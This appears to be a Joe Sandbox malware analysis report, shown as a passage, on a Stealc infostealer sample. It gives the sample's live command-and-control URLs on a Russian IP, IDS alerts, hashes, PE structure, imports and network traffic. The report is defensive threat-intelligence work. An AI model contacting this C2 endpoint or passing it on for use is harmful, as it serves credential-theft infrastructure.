http://94.141.122.159/baf27292fb61e144.php3F	uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://94.141.122.159/ws	uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://94.141.122.159/baf27292fb61e144.phpG	uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.141.122.159	unknown	Russian Federation		43429	UNITLINE_RST_NET1RostovnaDonuRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542883
Start date and time:	2024-10-26 19:21:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	uCEeVGAWIB.exe renamed because original name is a hash value
Original Sample Name:	9a4891bcf21b6639412f96c108a27744.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 23 Number of non-executed functions: 165
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: uCEeVGAWIB.exe

Simulations

Behavior and APIs

Time	Type	Description
13:22:31	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.141.122.159	ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exe	Get hash	malicious	Stealc, Vidar	Browse	94.141.122.159/baf27292fb61e144.php
94.141.122.159	igDFR5VY1K.exe	Get hash	malicious	Stealc	Browse	94.141.122.159/baf27292fb61e144.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNITLINE_RST_NET1RostovnaDonuRU	ZnPyVAOUBc.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	94.141.122.159
	ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exe	Get hash	malicious	Stealc, Vidar	Browse	94.141.122.159
	igDFR5VY1K.exe	Get hash	malicious	Stealc	Browse	94.141.122.159
	W67gX3Jo1F.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.141.123.114
	zKEylAn0Mb.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.141.123.114
	lbUCYrmjlo.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.141.123.114
	GZrCQ5cvLI.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.141.123.114
	AkPKizq7ND.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.141.123.114
	LBpAxeJkcW.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.141.123.114
	dEeSySeM1G.elf	Get hash	malicious	Gafgyt, Mirai	Browse	94.141.123.114

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_uCEeVGAWIB.exe_35b561223452744f6df6ca551f76be2830b1ae6_c44eca09_705ac8a5-a6bd-4c1f-9397-243e575a8137\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9634657765915392
Encrypted:	false
SSDEEP:	192:ubNRu7V0N2RuwjMhZrMZtzuiF+Z24IO8r8:UNRq2N2RDjjTzuiF+Y4IO8r
MD5:	C4B660A540C65BE0AABBF4619FECF26B
SHA1:	F36639754ED7604008820A54B53EDDCEA311A47F
SHA-256:	EF87C33D6AC5B5D7DCB1334AE61D38A08740894F572AE487DD74D78CFFC29B87
SHA-512:	6E1C26B8D2E6A42CFBD1AD3718A920102AA395D6821047D1AEA9AC10AD853B99B367C6949C3680F6CAA02D9380C28DAAE8179B080EEF93AA32DEE10A5136B59B
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.4.3.6.9.4.7.6.4.3.4.9.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.4.3.6.9.4.8.6.7.4.7.4.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.5.a.c.8.a.5.-.a.6.b.d.-.4.c.1.f.-.9.3.9.7.-.2.4.3.e.5.7.5.a.8.1.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.b.2.5.2.0.a.-.1.8.e.5.-.4.9.c.f.-.9.2.9.8.-.f.1.1.d.d.1.9.5.7.d.f.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.C.E.e.V.G.A.W.I.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.6.0.-.0.0.0.1.-.0.0.1.5.-.2.d.4.4.-.6.1.9.d.c.b.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.4.d.f.4.b.5.c.2.5.f.6.3.e.2.5.3.1.9.e.2.8.e.3.2.4.c.c.9.6.a.b.0.0.0.0.f.f.f.f.!.0.0.0.0.7.a.7.0.5.2.5.8.6.f.6.b.3.5.e.6.b.5.5.9.4.5.2.8.a.2.b.8.4.c.a.6.2.b.b.1.4.2.1.8.!.u.C.E.e.V.G.A.W.I.B...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FA7.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Oct 26 17:22:27 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	60682
Entropy (8bit):	1.925765185935961
Encrypted:	false
SSDEEP:	192:asrXUMS+W+YXNSZOEOJw2OxBYqAJeVFaAl4pn6XOW8xye02TErMKyhnyPUIj1gmO:/S+WbEEGxBYLyFas4N6X0E2APdZXIkY
MD5:	2A60CEC77556276B249CB9B7703F77B5
SHA1:	465856915C4F8347A85828FB4C5DDEE9E0EC24D7
SHA-256:	AB4830CD44B2A063E641123E2966F6885666546D1D771729C5EFA84764FDBC47
SHA-512:	C4C61916AE5345121FE23421265C0E6DB8DCCA9E52304F9D76985191D5C2AC5AC10E2C2D75325A880543E7D2375DB214D8098EE4168A0C91F4F75008F59CDE38
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......S%.g............4...............<............*..........T.......8...........T...........(3.........................................................................................................eJ......H.......GenuineIntel............T.......`...L%.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5277.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.6986500719069006
Encrypted:	false
SSDEEP:	192:R6l7wVeJpV6ZnG6Y2DUSU90hgmf3WupDM89bHmsfxNm:R6lXJ76ZnG6YZSU90hgmf37HFfy
MD5:	1ED48308C69909C868E3FDE72FE58658
SHA1:	E4A5B5B0146FFA3295287A50D575BE0C8E536C75
SHA-256:	29626029B6641F8705F576DD4B0CC4DF78B7AB07286C1B6B8EB85E2C6806AFA7
SHA-512:	FAA97F6AB6700E6E825371D4E80CD18E1580C43D03E22905ED9F0BCFD9F7CEC671C702A1EAE8E8A691718455C8F5B711AE121913E767D7A3650519ED7D8203CD
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.1.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER52C6.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.48684669478346
Encrypted:	false
SSDEEP:	48:cvIwWl8zsKJg77aI9h+WpW8VYzYm8M4JKQFV+q8O5gtT8eTd:uIjfYI7j/7VrJzVo8Gd
MD5:	CC1B773B4DAC60FD6B30C965C9CF7954
SHA1:	4D00B6F860E24CD65275B094259B2712F3671522
SHA-256:	BF65D060BCEB6992EAE876E15A9502BB7BFC745F5292EFD4C2F1BC79C7CBFC2D
SHA-512:	604048F52DD42A2871E54C84ED9E8EDC61832A32721BFDC3A01F3D1AA4DBA22FB09A3084C73D0FB28B916D351FD14EE632B0B0452C011D8B5D775AC190947548
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="560665" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468594717825806
Encrypted:	false
SSDEEP:	6144:3zZfpi6ceLPx9skLmb0faZWSP3aJG8nAgeiJRMMhA2zX4WABluuNEjDH5S:jZHtaZWOKnMM6bFpuj4
MD5:	DB78AC8C28402108B21476082329618E
SHA1:	786E6F081E893DCFECE355C2493E79EC5116FEE1
SHA-256:	C07BC6392D88C2CFB809808AEF529F5EE656824DCA46EB1C4E7D1D012A5B3B2B
SHA-512:	4B2ACF9A79CFCD70A1B10CEC46ACEC74F1B21A5E2666DA9C98E010138BEB34C73D8AA38546612F59387C401D16D44828A1521B2409705BF16273C8C9A8A2BEBB
Malicious:	false
Reputation:	low
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.I..'................................................................................................................................................................................................................................................................................................................................................_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.63302282535432
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	uCEeVGAWIB.exe
File size:	401'408 bytes
MD5:	9a4891bcf21b6639412f96c108a27744
SHA1:	7a7052586f6b35e6b5594528a2b84ca62bb14218
SHA256:	4dbfa3d8eef4144e8d2d90fa3f91d14aa7f09063aa0d9b5c7a17488f93ac861e
SHA512:	7cdbcf3938e0e73a7b7b0e582d7dcfd052413bf34c7cfc69254ea99af393b94f3685f5f857f352da88773c5d69ef07dafda9f732995dd5f917cb74d5762cc49b
SSDEEP:	6144:7ZsDqOtHrjoEDNLivA/eQcuz7d9pge2GOrMRonuzfo:eD1tpDNgA2uXd/GGwMRv
TLSH:	99846C2162F16812EEB76B315A3B8AECE66FBC63DE3C525D61143E1F18733B18512712
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......X...X...X..pX...X..bX...X..sX...X..eXd..X(].X...X...Xt..X..lX...X..rX...X..wX...XRich...X................PE..L...g..e...

File Icon


Icon Hash:	151a111210901409

Static PE Info

General

Entrypoint:	0x4016ea
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65B8BE67 [Tue Jan 30 09:16:23 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	39ffd9968f23520e932a47c640b29e7f

Entrypoint Preview

Instruction
call 00007F7EC8B1A188h
jmp 00007F7EC8B16B1Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00440778h], eax
mov dword ptr [00440774h], ecx
mov dword ptr [00440770h], edx
mov dword ptr [0044076Ch], ebx
mov dword ptr [00440768h], esi
mov dword ptr [00440764h], edi
mov word ptr [00440790h], ss
mov word ptr [00440784h], cs
mov word ptr [00440760h], ds
mov word ptr [0044075Ch], es
mov word ptr [00440758h], fs
mov word ptr [00440754h], gs
pushfd
pop dword ptr [00440788h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044077Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00440780h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044078Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004406C8h], 00010001h
mov eax, dword ptr [00440780h]
mov dword ptr [0044067Ch], eax
mov dword ptr [00440670h], C0000409h
mov dword ptr [00440674h], 00000001h
mov eax, dword ptr [0043F004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0043F008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000F0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3dbfc	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11f000	0x204f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3c000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3a37c	0x3a400	567556bdcce9f592fcd8a11c510891c7	False	0.8228817395386266	data	7.486368351428681	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3c000	0x25e0	0x2600	74fe167b866b3aafb68f9d9d7c2cf8d5	False	0.3843544407894737	data	5.517782620883267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3f000	0xdf978	0x4c00	d04384febfcf008bd047d4ae446c1575	False	0.08604029605263158	data	1.0009507978097547	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x11f000	0x1414f0	0x20600	467a239e767ac3404bb7a1079978c34b	False	0.40899493243243246	data	4.906392630717915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1375e8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x137718	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x11fac0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5565031982942431
RT_ICON	0x120968	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6304151624548736
RT_ICON	0x121210	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6762672811059908
RT_ICON	0x1218d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.736271676300578
RT_ICON	0x121e40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5033195020746888
RT_ICON	0x1243e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.5968574108818011
RT_ICON	0x125490	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.5926229508196721
RT_ICON	0x125e18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7331560283687943
RT_ICON	0x1262f8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.3358208955223881
RT_ICON	0x1271a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.39395306859205775
RT_ICON	0x127a48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.3957373271889401
RT_ICON	0x128110	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.4060693641618497
RT_ICON	0x128678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.22095435684647302
RT_ICON	0x12ac20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.24835834896810507
RT_ICON	0x12bcc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.28647540983606556
RT_ICON	0x12c650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.3147163120567376
RT_ICON	0x12cb30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39019189765458423
RT_ICON	0x12d9d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5464801444043321
RT_ICON	0x12e280	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6094470046082949
RT_ICON	0x12e948	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6401734104046243
RT_ICON	0x12eeb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.4101782363977486
RT_ICON	0x12ff58	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.39959016393442626
RT_ICON	0x1308e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.44858156028368795
RT_ICON	0x130db0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.34168443496801704
RT_ICON	0x131c58	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.46254512635379064
RT_ICON	0x132500	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.5057603686635944
RT_ICON	0x132bc8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.5216763005780347
RT_ICON	0x133130	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.42697095435684645
RT_ICON	0x1356d8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.43386491557223267
RT_ICON	0x136780	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.43401639344262294
RT_ICON	0x137108	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.449468085106383
RT_STRING	0x139e98	0x9a	data			0.6038961038961039
RT_STRING	0x139f38	0x6d6	data			0.42628571428571427
RT_STRING	0x13a610	0x4aa	data			0.4455611390284757
RT_STRING	0x13aac0	0x4dc	data			0.4429260450160772
RT_STRING	0x13afa0	0x7d4	data			0.41966067864271456
RT_STRING	0x13b778	0x718	data			0.42841409691629956
RT_STRING	0x13be90	0x696	data			0.4359430604982206
RT_STRING	0x13c528	0x616	data			0.43902439024390244
RT_STRING	0x13cb40	0x7de	data			0.41807348560079444
RT_STRING	0x13d320	0x5c6	data			0.4370771312584574
RT_STRING	0x13d8e8	0x5d8	data			0.44385026737967914
RT_STRING	0x13dec0	0x588	data			0.4392655367231638
RT_STRING	0x13e448	0x616	data			0.43838254172015406
RT_STRING	0x13ea60	0x4ee	data			0.4548335974643423
RT_STRING	0x13ef50	0x5a0	data			0.4354166666666667
RT_GROUP_CURSOR	0x139cc0	0x22	data			1.0588235294117647
RT_GROUP_ICON	0x137570	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x126280	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x130d48	0x68	data	Turkish	Turkey	0.7211538461538461
RT_GROUP_ICON	0x12cab8	0x76	data	Turkish	Turkey	0.6694915254237288
RT_VERSION	0x139ce8	0x1b0	data			0.5856481481481481

Imports

DLL

Import

KERNEL32.dll

GetComputerNameA, GetNumaNodeProcessorMask, GetNumaProcessorNode, GetLocaleInfoA, CallNamedPipeA, DeleteVolumeMountPointA, InterlockedIncrement, MoveFileExW, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, GlobalFlags, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetModuleFileNameW, GetConsoleFontSize, GetBinaryTypeW, IsBadStringPtrA, WritePrivateProfileStringW, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, GetProcAddress, GetLongPathNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, MoveFileA, SetCommMask, GetOEMCP, BuildCommDCBA, FatalAppExitA, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, CreateFileA, CloseHandle, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetModuleHandleA

WINHTTP.dll

WinHttpOpenRequest

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-26T19:22:28.565437+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49710	94.141.122.159	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:22:27.375103951 CEST	49710	80	192.168.2.6	94.141.122.159
Oct 26, 2024 19:22:27.380599022 CEST	80	49710	94.141.122.159	192.168.2.6
Oct 26, 2024 19:22:27.380753040 CEST	49710	80	192.168.2.6	94.141.122.159
Oct 26, 2024 19:22:27.381299019 CEST	49710	80	192.168.2.6	94.141.122.159
Oct 26, 2024 19:22:27.386629105 CEST	80	49710	94.141.122.159	192.168.2.6
Oct 26, 2024 19:22:28.277149916 CEST	80	49710	94.141.122.159	192.168.2.6
Oct 26, 2024 19:22:28.277209044 CEST	49710	80	192.168.2.6	94.141.122.159
Oct 26, 2024 19:22:28.281810045 CEST	49710	80	192.168.2.6	94.141.122.159
Oct 26, 2024 19:22:28.287421942 CEST	80	49710	94.141.122.159	192.168.2.6
Oct 26, 2024 19:22:28.565334082 CEST	80	49710	94.141.122.159	192.168.2.6
Oct 26, 2024 19:22:28.565437078 CEST	49710	80	192.168.2.6	94.141.122.159
Oct 26, 2024 19:22:33.717446089 CEST	80	49710	94.141.122.159	192.168.2.6
Oct 26, 2024 19:22:33.717510939 CEST	49710	80	192.168.2.6	94.141.122.159
Oct 26, 2024 19:22:33.874041080 CEST	49710	80	192.168.2.6	94.141.122.159

HTTP Request Dependency Graph

94.141.122.159

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	94.141.122.159	80	1120	C:\Users\user\Desktop\uCEeVGAWIB.exe

Timestamp	Bytes transferred	Direction	Data
